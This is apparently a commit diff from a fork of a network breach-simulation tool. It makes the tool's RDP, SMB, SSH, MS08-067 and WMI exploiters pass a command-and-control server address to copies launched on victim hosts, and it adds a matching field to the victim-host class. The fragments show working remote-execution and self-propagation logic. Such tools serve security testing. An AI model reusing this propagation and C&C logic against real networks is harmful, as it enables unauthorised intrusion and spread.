forked from p15670423/monkey
GC-4600: monkey is propagating current C&C server
This commit is contained in:
parent
fa4c92c7f1
commit
3522e6e02d
|
@ -255,9 +255,9 @@ class RdpExploiter(HostExploiter):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
if self._config.rdp_use_vbs_download:
|
if self._config.rdp_use_vbs_download:
|
||||||
command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path' : http_path}
|
command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path}
|
||||||
else:
|
else:
|
||||||
command = RDP_CMDLINE_HTTP_BITS % {'monkey_path': self._config.dropper_target_path, 'http_path' : http_path}
|
command = RDP_CMDLINE_HTTP_BITS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path}
|
||||||
|
|
||||||
passwords = list(self._config.psexec_passwords[:])
|
passwords = list(self._config.psexec_passwords[:])
|
||||||
known_password = host.get_credentials(self._config.psexec_user)
|
known_password = host.get_credentials(self._config.psexec_user)
|
||||||
|
|
|
@ -105,6 +105,8 @@ class SmbExploiter(HostExploiter):
|
||||||
|
|
||||||
if host.default_tunnel:
|
if host.default_tunnel:
|
||||||
cmdline += " -t " + host.default_tunnel
|
cmdline += " -t " + host.default_tunnel
|
||||||
|
if host.default_server:
|
||||||
|
cmdline += " -s " + host.default_server
|
||||||
|
|
||||||
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
|
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
|
||||||
rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, ))
|
rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, ))
|
||||||
|
|
|
@ -119,6 +119,8 @@ class SSHExploiter(HostExploiter):
|
||||||
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
|
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
|
||||||
if host.default_tunnel:
|
if host.default_tunnel:
|
||||||
cmdline += " -t " + host.default_tunnel
|
cmdline += " -t " + host.default_tunnel
|
||||||
|
if host.default_server:
|
||||||
|
cmdline += " -s " + host.default_server
|
||||||
|
|
||||||
cmdline += "&"
|
cmdline += "&"
|
||||||
ssh.exec_command(cmdline)
|
ssh.exec_command(cmdline)
|
||||||
|
|
|
@ -251,6 +251,8 @@ class Ms08_067_Exploiter(HostExploiter):
|
||||||
|
|
||||||
if host.default_tunnel:
|
if host.default_tunnel:
|
||||||
cmdline += " -t " + host.default_tunnel
|
cmdline += " -t " + host.default_tunnel
|
||||||
|
if host.default_server:
|
||||||
|
cmdline += " -s " + host.default_server
|
||||||
|
|
||||||
try:
|
try:
|
||||||
sock.send("start %s\r\n" % (cmdline, ))
|
sock.send("start %s\r\n" % (cmdline, ))
|
||||||
|
|
|
@ -86,6 +86,8 @@ class WmiExploiter(HostExploiter):
|
||||||
|
|
||||||
if host.default_tunnel:
|
if host.default_tunnel:
|
||||||
cmdline += " -t " + host.default_tunnel
|
cmdline += " -t " + host.default_tunnel
|
||||||
|
if host.default_server:
|
||||||
|
cmdline += " -s " + host.default_server
|
||||||
|
|
||||||
# execute the remote monkey
|
# execute the remote monkey
|
||||||
result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,
|
result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,
|
||||||
|
|
|
@ -9,6 +9,7 @@ class VictimHost(object):
|
||||||
self.services = {}
|
self.services = {}
|
||||||
self.monkey_exe = None
|
self.monkey_exe = None
|
||||||
self.default_tunnel = None
|
self.default_tunnel = None
|
||||||
|
self.default_server = None
|
||||||
|
|
||||||
def as_dict(self):
|
def as_dict(self):
|
||||||
return self.__dict__
|
return self.__dict__
|
||||||
|
@ -36,3 +37,6 @@ class VictimHost(object):
|
||||||
|
|
||||||
def get_credentials(self, username):
|
def get_credentials(self, username):
|
||||||
return self.cred.get(username.lower(), None)
|
return self.cred.get(username.lower(), None)
|
||||||
|
|
||||||
|
def set_default_server(self, default_server):
|
||||||
|
self.default_server = default_server
|
||||||
|
|
|
@ -112,13 +112,10 @@ class HTTPConnectProxyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||||
# just provide a tunnel, transfer the data with no modification
|
# just provide a tunnel, transfer the data with no modification
|
||||||
req = self
|
req = self
|
||||||
reqbody = None
|
reqbody = None
|
||||||
import pdb
|
|
||||||
pdb.set_trace()
|
|
||||||
req.path = "https://%s/" % req.path.replace(':443', '')
|
req.path = "https://%s/" % req.path.replace(':443', '')
|
||||||
|
|
||||||
u = urlsplit(req.path)
|
u = urlsplit(req.path)
|
||||||
address = (u.hostname, u.port or 443)
|
address = (u.hostname, u.port or 443)
|
||||||
uri = u
|
|
||||||
try:
|
try:
|
||||||
conn = socket.create_connection(address)
|
conn = socket.create_connection(address)
|
||||||
except socket.error:
|
except socket.error:
|
||||||
|
|
Loading…
Reference in New Issue